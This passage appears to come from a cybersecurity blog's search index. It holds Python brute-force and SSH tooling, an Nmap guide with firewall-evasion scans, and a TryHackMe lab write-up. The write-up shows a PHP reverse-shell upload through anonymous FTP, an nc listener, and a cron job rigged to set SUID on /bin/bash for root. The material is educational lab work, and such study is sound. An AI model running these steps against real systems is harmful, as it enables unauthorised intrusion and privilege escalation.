class=\"n\"\u003etimeout\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"mi\"\u003e3\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eallow_redirects\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"kc\"\u003eFalse\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003eif\u003c/span\u003e \u003cspan class=\"n\"\u003eresp\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003estatus_code\u003c/span\u003e \u003cspan class=\"ow\"\u003enot\u003c/span\u003e \u003cspan class=\"ow\"\u003ein\u003c/span\u003e \u003cspan class=\"p\"\u003e[\u003c/span\u003e\u003cspan class=\"mi\"\u003e404\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"mi\"\u003e403\u003c/span\u003e\u003cspan class=\"p\"\u003e]:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"n\"\u003efull_url\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eresp\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003estatus_code\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003eexcept\u003c/span\u003e \u003cspan class=\"n\"\u003erequests\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eRequestException\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003epass\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"kc\"\u003eNone\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"k\"\u003edef\u003c/span\u003e \u003cspan class=\"nf\"\u003edir_bruteforce\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003eurl\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003ewordlist_path\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003ewith\u003c/span\u003e \u003cspan class=\"nb\"\u003eopen\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003ewordlist_path\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e \u003cspan class=\"k\"\u003eas\u003c/span\u003e \u003cspan class=\"n\"\u003ef\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003ewords\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"p\"\u003e[\u003c/span\u003e\u003cspan class=\"n\"\u003eline\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003estrip\u003c/span\u003e\u003cspan class=\"p\"\u003e()\u003c/span\u003e \u003cspan class=\"k\"\u003efor\u003c/span\u003e \u003cspan class=\"n\"\u003eline\u003c/span\u003e \u003cspan class=\"ow\"\u003ein\u003c/span\u003e \u003cspan class=\"n\"\u003ef\u003c/span\u003e \u003cspan class=\"k\"\u003eif\u003c/span\u003e \u003cspan class=\"n\"\u003eline\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003estrip\u003c/span\u003e\u003cspan class=\"p\"\u003e()]\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003ewith\u003c/span\u003e \u003cspan class=\"n\"\u003eThreadPoolExecutor\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003emax_workers\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"mi\"\u003e20\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e \u003cspan class=\"k\"\u003eas\u003c/span\u003e \u003cspan class=\"n\"\u003eexecutor\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003efor\u003c/span\u003e \u003cspan class=\"n\"\u003eresult\u003c/span\u003e \u003cspan class=\"ow\"\u003ein\u003c/span\u003e \u003cspan class=\"n\"\u003eexecutor\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003emap\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"k\"\u003elambda\u003c/span\u003e \u003cspan class=\"n\"\u003ew\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e \u003cspan class=\"n\"\u003echeck_path\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003eurl\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003ew\u003c/span\u003e\u003cspan class=\"p\"\u003e),\u003c/span\u003e \u003cspan class=\"n\"\u003ewords\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003eif\u003c/span\u003e \u003cspan class=\"n\"\u003eresult\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"nb\"\u003eprint\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"sa\"\u003ef\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;[\u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan class=\"n\"\u003eresult\u003c/span\u003e\u003cspan class=\"p\"\u003e[\u003c/span\u003e\u003cspan class=\"mi\"\u003e1\u003c/span\u003e\u003cspan class=\"p\"\u003e]\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e] \u003c/span\u003e\u003cspan class=\"si\"\u003e{\u003c/span\u003e\u003cspan class=\"n\"\u003eresult\u003c/span\u003e\u003cspan class=\"p\"\u003e[\u003c/span\u003e\u003cspan class=\"mi\"\u003e0\u003c/span\u003e\u003cspan class=\"p\"\u003e]\u003c/span\u003e\u003cspan class=\"si\"\u003e}\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"n\"\u003edir_bruteforce\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;http://target.com\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"s2\"\u003e\u0026#34;/usr/share/wordlists/dirb/common.txt\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"ssh-with-paramiko\"\u003eSSH with Paramiko\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-python\" data-lang=\"python\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"kn\"\u003eimport\u003c/span\u003e \u003cspan class=\"nn\"\u003eparamiko\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"k\"\u003edef\u003c/span\u003e \u003cspan class=\"nf\"\u003essh_connect\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eusername\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003epassword\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"mi\"\u003e22\u003c/span\u003e\u003cspan class=\"p\"\u003e):\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003eclient\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003eparamiko\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eSSHClient\u003c/span\u003e\u003cspan class=\"p\"\u003e()\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003eclient\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eset_missing_host_key_policy\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003eparamiko\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eAutoAddPolicy\u003c/span\u003e\u003cspan class=\"p\"\u003e())\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003etry\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003eclient\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003econnect\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003ehost\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"n\"\u003eport\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003eusername\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"n\"\u003eusername\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003epassword\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"n\"\u003epassword\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003etimeout\u003c/span\u003e\u003cspan class=\"o\"\u003e=\u003c/span\u003e\u003cspan class=\"mi\"\u003e5\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003e_\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003estdout\u003c/span\u003e\u003cspan class=\"p\"\u003e,\u003c/span\u003e \u003cspan class=\"n\"\u003e_\u003c/span\u003e \u003cspan class=\"o\"\u003e=\u003c/span\u003e \u003cspan class=\"n\"\u003eclient\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eexec_command\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"s2\"\u003e\u0026#34;id \u0026amp;\u0026amp; hostname\u0026#34;\u003c/span\u003e\u003cspan class=\"p\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"nb\"\u003eprint\u003c/span\u003e\u003cspan class=\"p\"\u003e(\u003c/span\u003e\u003cspan class=\"n\"\u003estdout\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eread\u003c/span\u003e\u003cspan class=\"p\"\u003e()\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003edecode\u003c/span\u003e\u003cspan class=\"p\"\u003e())\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"n\"\u003eclient\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eclose\u003c/span\u003e\u003cspan class=\"p\"\u003e()\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"kc\"\u003eTrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003eexcept\u003c/span\u003e \u003cspan class=\"n\"\u003eparamiko\u003c/span\u003e\u003cspan class=\"o\"\u003e.\u003c/span\u003e\u003cspan class=\"n\"\u003eAuthenticationException\u003c/span\u003e\u003cspan class=\"p\"\u003e:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e \u003cspan class=\"k\"\u003ereturn\u003c/span\u003e \u003cspan class=\"kc\"\u003eFalse\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"recommended-projects-to-build\"\u003eRecommended Projects to Build\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003ePort Scanner\u003c/strong\u003e ← Start here\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSubdomain Enumeration tool\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eWeb Directory Brute-forcer\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePacket Sniffer\u003c/strong\u003e using Scapy\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSSH brute-force\u003c/strong\u003e (authorized targets only!)\u003c/li\u003e\n\u003c/ol\u003e","title":"Python for Hackers — Basics to Real Tools"},{"content":"Terms of Use Last updated: April 19, 2026\nEthical Use All educational content on this blog is intended for ethical learning purposes only. Using any information for illegal or harmful purposes is strictly prohibited.\nIntellectual Property All original content is protected by copyright. You may share content with proper attribution to the source.\nDisclaimer The blog provides information \u0026ldquo;as is\u0026rdquo; without warranties. We are not responsible for any misuse of the information provided.\nChanges to Terms We reserve the right to modify these terms at any time. Continued use of the blog constitutes acceptance of the updated terms.\n","permalink":"https://cyberah-blog.pages.dev/en/terms/","summary":"\u003ch2 id=\"terms-of-use\"\u003eTerms of Use\u003c/h2\u003e\n\u003cp\u003eLast updated: April 19, 2026\u003c/p\u003e\n\u003ch3 id=\"ethical-use\"\u003eEthical Use\u003c/h3\u003e\n\u003cp\u003eAll educational content on this blog is intended for \u003cstrong\u003eethical learning purposes only\u003c/strong\u003e. Using any information for illegal or harmful purposes is strictly prohibited.\u003c/p\u003e\n\u003ch3 id=\"intellectual-property\"\u003eIntellectual Property\u003c/h3\u003e\n\u003cp\u003eAll original content is protected by copyright. You may share content with proper attribution to the source.\u003c/p\u003e\n\u003ch3 id=\"disclaimer\"\u003eDisclaimer\u003c/h3\u003e\n\u003cp\u003eThe blog provides information \u0026ldquo;as is\u0026rdquo; without warranties. We are not responsible for any misuse of the information provided.\u003c/p\u003e","title":"Terms of Use"},{"content":"What is Nmap? Nmap (Network Mapper) is the world\u0026rsquo;s most powerful network scanning tool, used by ethical hackers and security professionals to discover hosts, open ports, service versions, and OS details.\nBasic Usage # Quick scan — 100 most common ports nmap -F 192.168.1.1 # Full port scan (all 65535) nmap -p- 192.168.1.1 # Subnet scan nmap 192.168.1.0/24 Service and Version Detection # Detect service versions nmap -sV 192.168.1.1 # OS detection nmap -O 192.168.1.1 # Recommended comprehensive scan nmap -sV -sC -O -p- --min-rate 5000 192.168.1.1 Scan Types Type Flag Use Case SYN Scan -sS Default, fast and stealthy TCP Connect -sT When no root privileges UDP Scan -sU For UDP services NULL Scan -sN Firewall bypass Xmas Scan -sX Firewall bypass sudo nmap -sS 192.168.1.1 sudo nmap -sU -p- 192.168.1.1 Nmap Scripting Engine (NSE) The real power of Nmap lies in its script library.\n# Default scripts nmap -sC 192.168.1.1 # Vulnerability scripts nmap --script vuln 192.168.1.1 # Specific scripts nmap --script=smb-vuln-ms17-010 192.168.1.1 nmap --script=http-enum,http-headers,http-methods 192.168.1.1 Firewall Evasion # Fragment packets nmap -f 192.168.1.1 # Custom MTU nmap --mtu 24 192.168.1.1 # Decoy scan (add fake IPs) nmap -D RND:10 192.168.1.1 # Spoof source port nmap --source-port 53 192.168.1.1 # Timing (T0=slowest/stealthiest, T5=fastest) nmap -T1 192.168.1.1 Saving Output nmap -oN output.txt 192.168.1.1 # Normal text nmap -oX output.xml 192.168.1.1 # XML nmap -oA all_formats 192.168.1.1 # All formats Ready-to-Use Commands # Full comprehensive scan sudo nmap -sV -sC -p- --min-rate 5000 -oN full_scan.txt TARGET # Quick CTF scan nmap -sV -sC -p 21,22,80,443,445,8080 TARGET # Web targeting nmap --script=http-title,http-headers,http-methods -p 80,443 TARGET ","permalink":"https://cyberah-blog.pages.dev/en/tools/nmap-complete-guide/","summary":"\u003ch2 id=\"what-is-nmap\"\u003eWhat is Nmap?\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eNmap\u003c/strong\u003e (Network Mapper) is the world\u0026rsquo;s most powerful network scanning tool, used by ethical hackers and security professionals to discover hosts, open ports, service versions, and OS details.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Quick scan — 100 most common ports\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -F 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Full port scan (all 65535)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -p- 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Subnet scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap 192.168.1.0/24\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch3 id=\"service-and-version-detection\"\u003eService and Version Detection\u003c/h3\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Detect service versions\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -sV 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# OS detection\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -O 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Recommended comprehensive scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -sV -sC -O -p- --min-rate \u003cspan class=\"m\"\u003e5000\u003c/span\u003e 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"scan-types\"\u003eScan Types\u003c/h2\u003e\n\u003ctable\u003e\n \u003cthead\u003e\n \u003ctr\u003e\n \u003cth\u003eType\u003c/th\u003e\n \u003cth\u003eFlag\u003c/th\u003e\n \u003cth\u003eUse Case\u003c/th\u003e\n \u003c/tr\u003e\n \u003c/thead\u003e\n \u003ctbody\u003e\n \u003ctr\u003e\n \u003ctd\u003eSYN Scan\u003c/td\u003e\n \u003ctd\u003e\u003ccode\u003e-sS\u003c/code\u003e\u003c/td\u003e\n \u003ctd\u003eDefault, fast and stealthy\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eTCP Connect\u003c/td\u003e\n \u003ctd\u003e\u003ccode\u003e-sT\u003c/code\u003e\u003c/td\u003e\n \u003ctd\u003eWhen no root privileges\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eUDP Scan\u003c/td\u003e\n \u003ctd\u003e\u003ccode\u003e-sU\u003c/code\u003e\u003c/td\u003e\n \u003ctd\u003eFor UDP services\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eNULL Scan\u003c/td\u003e\n \u003ctd\u003e\u003ccode\u003e-sN\u003c/code\u003e\u003c/td\u003e\n \u003ctd\u003eFirewall bypass\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eXmas Scan\u003c/td\u003e\n \u003ctd\u003e\u003ccode\u003e-sX\u003c/code\u003e\u003c/td\u003e\n \u003ctd\u003eFirewall bypass\u003c/td\u003e\n \u003c/tr\u003e\n \u003c/tbody\u003e\n\u003c/table\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo nmap -sS 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003esudo nmap -sU -p- 192.168.1.1\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"nmap-scripting-engine-nse\"\u003eNmap Scripting Engine (NSE)\u003c/h2\u003e\n\u003cp\u003eThe real power of Nmap lies in its script library.\u003c/p\u003e","title":"The Complete Nmap Guide — Beginner to Pro"},{"content":"\nBox Info Field Details Platform TryHackMe Difficulty Easy OS Linux Skills FTP, File Upload RCE, Cron Privesc Phase 1: Reconnaissance nmap -sV -sC -p- --min-rate 5000 10.10.X.X # Results: # PORT STATE SERVICE VERSION # 21/tcp open ftp vsftpd 3.0.3 # 22/tcp open ssh OpenSSH 7.2p2 # 80/tcp open http Apache 2.4.18 Phase 2: FTP Anonymous Access ftp 10.10.X.X # Username: anonymous # Password: (empty) ftp\u0026gt; ls -la # Found: notice.txt, important.jpg ftp\u0026gt; get notice.txt ftp\u0026gt; get important.jpg Phase 3: Web Enumeration gobuster dir -u http://10.10.X.X -w /usr/share/wordlists/dirb/common.txt # Found: # /files (200) ← Shared with FTP! Phase 4: RCE via PHP Shell Upload # Upload PHP reverse shell via FTP ftp 10.10.X.X ftp\u0026gt; put shell.php # Start listener nc -lvnp 4444 # Trigger shell via browser: # http://10.10.X.X/files/shell.php We have a shell!\npython3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; export TERM=xterm Phase 5: Privilege Escalation # Check cron jobs cat /etc/crontab # Found: writable script running as root echo \u0026#34;chmod +s /bin/bash\u0026#34; \u0026gt;\u0026gt; /path/to/script.sh # Wait for cron... /bin/bash -p # root# Flags user.txt: THM{XXXXXXXXXXXXXXXXXX} root.txt: THM{XXXXXXXXXXXXXXXXXX} Lessons Learned Anonymous FTP should always be disabled on production systems Sharing FTP directories with the web root is a critical RCE vulnerability Cron jobs running as root with writable scripts = trivial privilege escalation ","permalink":"https://cyberah-blog.pages.dev/en/writeups/thm/thm-startup/","summary":"\u003cp\u003e\u003cimg alt=\"Startup Room Banner\" loading=\"lazy\" src=\"/images/2.jpg\"\u003e\u003c/p\u003e\n\u003ch2 id=\"box-info\"\u003eBox Info\u003c/h2\u003e\n\u003ctable\u003e\n \u003cthead\u003e\n \u003ctr\u003e\n \u003cth\u003eField\u003c/th\u003e\n \u003cth\u003eDetails\u003c/th\u003e\n \u003c/tr\u003e\n \u003c/thead\u003e\n \u003ctbody\u003e\n \u003ctr\u003e\n \u003ctd\u003ePlatform\u003c/td\u003e\n \u003ctd\u003eTryHackMe\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eDifficulty\u003c/td\u003e\n \u003ctd\u003eEasy\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eOS\u003c/td\u003e\n \u003ctd\u003eLinux\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003eSkills\u003c/td\u003e\n \u003ctd\u003eFTP, File Upload RCE, Cron Privesc\u003c/td\u003e\n \u003c/tr\u003e\n \u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"phase-1-reconnaissance\"\u003ePhase 1: Reconnaissance\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003enmap -sV -sC -p- --min-rate \u003cspan class=\"m\"\u003e5000\u003c/span\u003e 10.10.X.X\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# Results:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# PORT STATE SERVICE VERSION\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# 21/tcp open ftp vsftpd 3.0.3\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"c1\"\u003e# 22/tcp open ssh OpenSSH 7.2p2\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan 